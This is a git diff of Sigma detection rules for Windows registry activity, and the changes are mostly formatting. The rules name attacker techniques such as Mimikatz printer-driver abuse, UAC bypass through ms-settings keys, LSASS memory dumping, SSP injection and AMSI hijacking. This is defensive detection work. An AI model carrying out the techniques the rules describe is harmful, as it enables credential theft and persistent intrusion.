a/sigma/sysmon/registry/registry_event/registry_event_malware_qakbot_registry.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_malware_qakbot_registry.yml @@ -1,8 +1,7 @@ title: Potential Qakbot Registry Activity id: 1c8e96cd-2bed-487d-9de0-b46c90cade56 status: experimental -description: Detects a registry key used by IceID in a campaign that distributes malicious - OneNote files +description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: Hieu Tran diff --git a/sigma/sysmon/registry/registry_event/registry_event_mimikatz_printernightmare.yml b/sigma/sysmon/registry/registry_event/registry_event_mimikatz_printernightmare.yml index 83abac82d..64d57d183 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_mimikatz_printernightmare.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_mimikatz_printernightmare.yml @@ -1,8 +1,7 @@ title: PrinterNightmare Mimikatz Driver Name id: ba6b9e43-1d45-4d3c-a504-1043a64c8469 status: test -description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited - in CVE-2021-1675 and CVE-2021-34527 +description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 references: - https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760 - https://www.lexjansen.com/sesug/1993/SESUG93035.pdf @@ -45,10 +44,8 @@ detection: - Gentil Kiwi - mimikatz printer - Kiwi Legit Printer - condition: registry_event and (selection or selection_alt or (selection_print - and selection_kiwi)) + condition: registry_event and (selection or selection_alt or (selection_print and selection_kiwi)) falsepositives: - - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser - printer (unlikely) + - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely) level: critical ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_event/registry_event_modify_screensaver_binary_path.yml b/sigma/sysmon/registry/registry_event/registry_event_modify_screensaver_binary_path.yml index 99f79cf06..8c35bf5ca 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_modify_screensaver_binary_path.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_modify_screensaver_binary_path.yml @@ -1,8 +1,7 @@ title: Path To Screensaver Binary Modified id: 67a6c006-3fbe-46a7-9074-2ba3b82c3000 status: test -description: Detects value modification of registry key containing path to binary - used as screensaver. +description: Detects value modification of registry key containing path to binary used as screensaver. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf @@ -25,7 +24,7 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetObject|endswith: \Control Panel\Desktop\SCRNSAVE.EXE + TargetObject|endswith: \Control Panel\Desktop\SCRNSAVE.EXE # HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE filter: Image|endswith: - \rundll32.exe diff --git a/sigma/sysmon/registry/registry_event/registry_event_narrator_feedback_persistance.yml b/sigma/sysmon/registry/registry_event/registry_event_narrator_feedback_persistance.yml index 1e3f07933..11eb04313 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_narrator_feedback_persistance.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_narrator_feedback_persistance.yml @@ -22,10 +22,11 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection1: - EventType: DeleteValue + EventType: DeleteValue TargetObject|endswith: \AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\DelegateExecute selection2: TargetObject|endswith: \AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\(Default) + # Add the payload in the (Default) condition: registry_event and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml b/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml index 449ad061f..65a8c2967 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml @@ -1,13 +1,9 @@ title: New DLL Added to AppCertDlls Registry Key id: 6aa1d992-5925-4e9f-a49b-845e51d1de01 status: test -description: 'Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs - value in the Registry key can be abused to obtain persistence and privilege escalation - - by causing a malicious DLL to be loaded and run in the context of separate processes - on the computer. - - ' +description: | + Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation + by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. references: - http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html @@ -29,8 +25,10 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetObject: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls - - NewName: HKLM\SYSTEM\CurentControlSet\Control\Session Manager\AppCertDlls + # Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one + - TargetObject: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls + # key rename + - NewName: HKLM\SYSTEM\CurentControlSet\Control\Session Manager\AppCertDlls condition: registry_event and selection fields: - EventID diff --git a/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml b/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml index e922eba9c..2d4007506 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml @@ -1,9 +1,7 @@ title: New DLL Added to AppInit_DLLs Registry Key id: 4f84b697-c9ed-4420-8ab5-e09af5b2345d status: test -description: DLLs that are specified in the AppInit_DLLs value in the Registry key - HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll - into every process that loads user32.dll +description: DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll references: - https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html author: Ilyas Ochkov, oscd.community, Tim Shelton @@ -24,12 +22,13 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetObject|endswith: - - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls - - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls - - NewName|endswith: - - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls - - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + - TargetObject|endswith: + - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + # Key Rename + - NewName|endswith: + - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls filter: Details: (Empty) condition: registry_event and (selection and not filter) diff --git a/sigma/sysmon/registry/registry_event/registry_event_office_test_regadd.yml b/sigma/sysmon/registry/registry_event/registry_event_office_test_regadd.yml index 0c05c3ab9..a494f2a4c 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_office_test_regadd.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_office_test_regadd.yml @@ -1,8 +1,7 @@ title: Office Application Startup - Office Test id: 3d27f6dd-1c74-4687-b4fa-ca849d128d1c status: test -description: Detects the addition of office test registry that allows a user to specify - an arbitrary DLL that will be executed every time an Office application is started +description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started references: - https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/ author: omkar72 diff --git a/sigma/sysmon/registry/registry_event/registry_event_office_trust_record_modification.yml b/sigma/sysmon/registry/registry_event/registry_event_office_trust_record_modification.yml index fcb9b77b4..b44564b7d 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_office_trust_record_modification.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_office_trust_record_modification.yml @@ -1,11 +1,10 @@ title: Windows Registry Trust Record Modification id: 295a59c1-7b79-4b47-a930-df12c15fc9c2 related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: similar + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd + type: similar status: test -description: Alerts on trust record modification within the registry, indicating usage - of macros +description: Alerts on trust record modification within the registry, indicating usage of macros references: - https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/ - http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html diff --git a/sigma/sysmon/registry/registry_event/registry_event_persistence_recycle_bin.yml b/sigma/sysmon/registry/registry_event/registry_event_persistence_recycle_bin.yml index db3c33292..126a3afdf 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_persistence_recycle_bin.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_persistence_recycle_bin.yml @@ -24,10 +24,10 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection_create: - EventType: RenameKey + EventType: RenameKey NewName|contains: \CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open selection_set: - EventType: SetValue + EventType: SetValue TargetObject|contains: \CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command\(Default) condition: registry_event and (1 of selection_*) falsepositives: diff --git a/sigma/sysmon/registry/registry_event/registry_event_portproxy_registry_key.yml b/sigma/sysmon/registry/registry_event/registry_event_portproxy_registry_key.yml index 041eb97c1..e21c6f19f 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_portproxy_registry_key.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_portproxy_registry_key.yml @@ -1,8 +1,7 @@ title: PortProxy Registry Key id: a54f842a-3713-4b45-8c84-5f136fdebd3c status: test -description: Detects the modification of PortProxy registry key which is used for - port forwarding. For command execution see rule win_netsh_port_fwd.yml. +description: Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml. references: - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html - https://adepts.of0x.cc/netsh-portproxy-code/ diff --git a/sigma/sysmon/registry/registry_event/registry_event_runkey_winekey.yml b/sigma/sysmon/registry/registry_event/registry_event_runkey_winekey.yml index d60e77b5f..107299b61 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_runkey_winekey.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_runkey_winekey.yml @@ -1,8 +1,7 @@ title: WINEKEY Registry Modification id: b98968aa-dbc0-4a9c-ac35-108363cbf8d5 status: test -description: Detects potential malicious modification of run keys by winekey or team9 - backdoor +description: Detects potential malicious modification of run keys by winekey or team9 backdoor references: - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html author: omkar72 @@ -23,8 +22,7 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetObject|endswith: Software\Microsoft\Windows\CurrentVersion\Run\Backup - Mgr + TargetObject|endswith: Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr condition: registry_event and selection fields: - ComputerName diff --git a/sigma/sysmon/registry/registry_event/registry_event_runonce_persistence.yml b/sigma/sysmon/registry/registry_event/registry_event_runonce_persistence.yml index 0e9d5eadc..6a1c19021 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_runonce_persistence.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_runonce_persistence.yml @@ -1,8 +1,7 @@ title: Run Once Task Configuration in Registry id: c74d7efc-8826-45d9-b8bb-f04fac9e4eff status: test -description: Rule to detect the configuration of Run Once registry key. Configured - payload can be run by runonce.exe /AlternateShellStartup +description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup references: - https://twitter.com/pabraeken/status/990717080805789697 - https://lolbas-project.github.io/lolbas/Binaries/Runonce/ @@ -28,14 +27,12 @@ detection: TargetObject|endswith: \StubPath filter_chrome: Details|startswith: '"C:\Program Files\Google\Chrome\Application\' - Details|contains: \Installer\chrmstp.exe" --configure-user-settings --verbose-logging - --system-level + Details|contains: \Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level # In some cases the Details will contain an additional flag called "--channel=stable" at the end filter_edge: Details|startswith: - '"C:\Program Files (x86)\Microsoft\Edge\Application\' - '"C:\Program Files\Microsoft\Edge\Application\' - Details|endswith: \Installer\setup.exe" --configure-user-settings --verbose-logging - --system-level --msedge --channel=stable + Details|endswith: \Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable condition: registry_event and (selection and not 1 of filter_*) falsepositives: - Legitimate modification of the registry key by legitimate program diff --git a/sigma/sysmon/registry/registry_event/registry_event_shell_open_keys_manipulation.yml b/sigma/sysmon/registry/registry_event/registry_event_shell_open_keys_manipulation.yml index 3a4c71821..48b159b32 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_shell_open_keys_manipulation.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_shell_open_keys_manipulation.yml @@ -1,9 +1,7 @@ title: Shell Open Registry Keys Manipulation id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 status: test -description: Detects the shell open key manipulation (exefile and ms-settings) used - for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, - slui.exe via registry keys (e.g. UACMe 33 or 62) +description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) references: - https://github.com/hfiref0x/UACME - https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ @@ -29,20 +27,19 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection1: - EventType: SetValue + EventType: SetValue TargetObject|endswith: Classes\ms-settings\shell\open\command\SymbolicLinkValue Details|contains: \Software\Classes\{ selection2: TargetObject|endswith: Classes\ms-settings\shell\open\command\DelegateExecute selection3: - EventType: SetValue + EventType: SetValue TargetObject|endswith: - Classes\ms-settings\shell\open\command\(Default) - Classes\exefile\shell\open\command\(Default) filter_sel3: Details: (Empty) - condition: registry_event and (selection1 or selection2 or (selection3 and not - filter_sel3)) + condition: registry_event and (selection1 or selection2 or (selection3 and not filter_sel3)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/registry/registry_event/registry_event_silentprocessexit_lsass.yml b/sigma/sysmon/registry/registry_event/registry_event_silentprocessexit_lsass.yml index ff4988e05..38c1cbbfd 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_silentprocessexit_lsass.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_silentprocessexit_lsass.yml @@ -1,11 +1,10 @@ title: Potential Credential Dumping Via LSASS SilentProcessExit Technique id: 55e29995-75e7-451a-bef0-6225e2f13597 related: - - id: 36803969-5421-41ec-b92f-8500f79c23b0 - type: similar + - id: 36803969-5421-41ec-b92f-8500f79c23b0 + type: similar status: test -description: Detects changes to the Registry in which a monitor program gets registered - to dump the memory of the lsass.exe process +description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process references: - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ diff --git a/sigma/sysmon/registry/registry_event/registry_event_ssp_added_lsa_config.yml b/sigma/sysmon/registry/registry_event/registry_event_ssp_added_lsa_config.yml index 46cc8eb4d..bc246c71e 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_ssp_added_lsa_config.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_ssp_added_lsa_config.yml @@ -1,8 +1,7 @@ title: Security Support Provider (SSP) Added to LSA Configuration id: eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc status: test -description: Detects the addition of a SSP to the registry. Upon a reboot or API call, - SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. +description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. references: - https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/ author: iwillkeepwatch diff --git a/sigma/sysmon/registry/registry_event/registry_event_stickykey_like_backdoor.yml b/sigma/sysmon/registry/registry_event/registry_event_stickykey_like_backdoor.yml index 3cbc24e17..dfc56925b 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_stickykey_like_backdoor.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_stickykey_like_backdoor.yml @@ -1,9 +1,7 @@ title: Sticky Key Like Backdoor Usage - Registry id: baca5663-583c-45f9-b5dc-ea96a22ce542 status: test -description: Detects the usage and installation of a backdoor that uses an option - to register a malicious debugger for built-in tools that are accessible in the - login screen +description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen references: - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ diff --git a/sigma/sysmon/registry/registry_event/registry_event_susp_atbroker_change.yml b/sigma/sysmon/registry/registry_event/registry_event_susp_atbroker_change.yml index 1b5c73924..382b76021 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_susp_atbroker_change.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_susp_atbroker_change.yml @@ -1,8 +1,7 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b status: test -description: Detects creation/modification of Assistive Technology applications and - persistence with usage of 'at' +description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ diff --git a/sigma/sysmon/registry/registry_event/registry_event_susp_download_run_key.yml b/sigma/sysmon/registry/registry_event/registry_event_susp_download_run_key.yml index 11c5c5aea..f6053ae6e 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_susp_download_run_key.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_susp_download_run_key.yml @@ -1,8 +1,7 @@ title: Suspicious Run Key from Download id: 9c5037d1-c568-49b3-88c7-9846a5bdc2be status: test -description: Detects the suspicious RUN keys created by software located in Download - or temporary Outlook/Internet Explorer directories +description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories references: - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_event/registry_event_susp_lsass_dll_load.yml b/sigma/sysmon/registry/registry_event/registry_event_susp_lsass_dll_load.yml index 8ca789567..0fbe965a3 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_susp_lsass_dll_load.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_susp_lsass_dll_load.yml @@ -1,8 +1,7 @@ title: DLL Load via LSASS id: b3503044-60ce-4bf4-bbcb-e3db98788823 status: test -description: Detects a method to load DLL via LSASS process using an undocumented - Registry key +description: Detects a method to load DLL via LSASS process using an undocumented Registry key references: - https://blog.xpnsec.com/exploring-mimikatz-part-1/ - https://twitter.com/SBousseaden/status/1183745981189427200 diff --git a/sigma/sysmon/registry/registry_event/registry_event_susp_mic_cam_access.yml b/sigma/sysmon/registry/registry_event/registry_event_susp_mic_cam_access.yml index 5e5787662..1dfe8ead7 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_susp_mic_cam_access.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_susp_mic_cam_access.yml @@ -1,8 +1,7 @@ title: Suspicious Camera and Microphone Access id: 62120148-6b7a-42be-8b91-271c04e281a3 status: test -description: Detects Processes accessing the camera and microphone from suspicious - folder +description: Detects Processes accessing the camera and microphone from suspicious folder references: - https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072 author: Den Iuzvyk @@ -41,7 +40,6 @@ detection: - :#Users#Desktop# condition: registry_event and (all of selection_*) falsepositives: - - Unlikely, there could be conferencing software running from a Temp folder accessing - the devices + - Unlikely, there could be conferencing software running from a Temp folder accessing the devices level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_event/registry_set_enable_anonymous_connection.yml b/sigma/sysmon/registry/registry_event/registry_set_enable_anonymous_connection.yml index bb82190d6..160995079 100644 --- a/sigma/sysmon/registry/registry_event/registry_set_enable_anonymous_connection.yml +++ b/sigma/sysmon/registry/registry_event/registry_set_enable_anonymous_connection.yml @@ -1,8 +1,7 @@ title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback id: 4d431012-2ab5-4db7-a84e-b29809da2172 status: experimental -description: Detects enabling of the "AllowAnonymousCallback" registry value, which - allows a remote connection between computers that do not have a trust relationship. +description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. references: - https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml b/sigma/sysmon/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml index 7cd336df4..8b3fda6ba 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml @@ -1,8 +1,7 @@ title: Registry Persistence via Service in Safe Mode id: 1547e27c-3974-43e2-a7d7-7f484fb928ec status: experimental -description: Detects the modification of the registry to allow a driver or service - to persist in Safe Mode. +description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network diff --git a/sigma/sysmon/registry/registry_set/registry_set_add_port_monitor.yml b/sigma/sysmon/registry/registry_set/registry_set_add_port_monitor.yml index 2fa0208e3..51d5ae90e 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_add_port_monitor.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_add_port_monitor.yml @@ -1,13 +1,9 @@ title: Add Port Monitor Persistence in Registry id: 944e8941-f6f6-4ee8-ac05-1c224e923c0e status: experimental -description: 'Adversaries may use port monitors to run an attacker supplied DLL during - system boot for persistence or privilege escalation. - - A port monitor can be set through the AddMonitor API call to set a DLL to be loaded - at startup. - - ' +description: | + Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. + A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md author: frack113 @@ -29,10 +25,9 @@ detection: Details|endswith: .dll filter_cutepdf: Image: C:\Windows\System32\spoolsv.exe - TargetObject|contains: \System\CurrentControlSet\Control\Print\Monitors\CutePDF - Writer Monitor v4.0\Driver + TargetObject|contains: \System\CurrentControlSet\Control\Print\Monitors\CutePDF Writer Monitor v4.0\Driver Details: cpwmon64_v40.dll - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI filter_leg1: diff --git a/sigma/sysmon/registry/registry_set/registry_set_aedebug_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_aedebug_persistence.yml index 5970efb1f..0a5fb6286 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_aedebug_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_aedebug_persistence.yml @@ -1,9 +1,7 @@ title: Add Debugger Entry To AeDebug For Persistence id: 092af964-4233-4373-b4ba-d86ea2890288 status: experimental -description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" - key in order to achieve persistence which will get invoked when an application - crashes +description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes references: - https://persistence-info.github.io/Data/aedebug.html - https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging @@ -27,7 +25,6 @@ detection: Details: '"C:\WINDOWS\system32\vsjitdebugger.exe" -p %ld -e %ld -j 0x%p' condition: registry_set and (selection and not filter) falsepositives: - - Legitimate use of the key to setup a debugger. Which is often the case on developers - machines + - Legitimate use of the key to setup a debugger. Which is often the case on developers machines level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml b/sigma/sysmon/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml index de3c0e651..28ee8f76b 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml @@ -1,8 +1,7 @@ title: Allow RDP Remote Assistance Feature id: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b status: experimental -description: Detect enable rdp feature to allow specific user to rdp connect on the - targeted machine +description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_amsi_com_hijack.yml b/sigma/sysmon/registry/registry_set/registry_set_amsi_com_hijack.yml index 21bdcf8af..ee5563773 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_amsi_com_hijack.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_amsi_com_hijack.yml @@ -1,11 +1,7 @@ title: Potential AMSI COM Server Hijacking id: 160d2780-31f7-4922-8b3a-efce30e63e96 status: experimental -description: Detects changes to the AMSI come server registry key in order disable - AMSI scanning functionalities. When AMSI attempts to starts its COM component, - it will query its registered CLSID and return a non-existent COM server. This - causes a load failure and prevents any scanning methods from being accessed, ultimately - rendering AMSI useless +description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless references: - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml index fb4a248e7..29e577220 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml @@ -1,16 +1,15 @@ title: Classes Autorun Keys Modification id: 9df5f547-c86a-433e-b533-f2794357e242 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -52,6 +51,7 @@ detection: Image: C:\Windows\System32\drvinst.exe filter_svchost: Image: C:\Windows\System32\svchost.exe + # If more targets are found from "svchost". Please exclude the whole image TargetObject|contains: \lnkfile\shellex\ContextMenuHandlers\ condition: registry_set and (all of selection_* and not 1 of filter_*) fields: @@ -60,8 +60,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml index a6500843e..b7237eef4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml @@ -1,17 +1,16 @@ title: Common Autorun Keys Modification id: f59c3faf-50f3-464b-9f4c-1b67ab512d99 related: - - id: 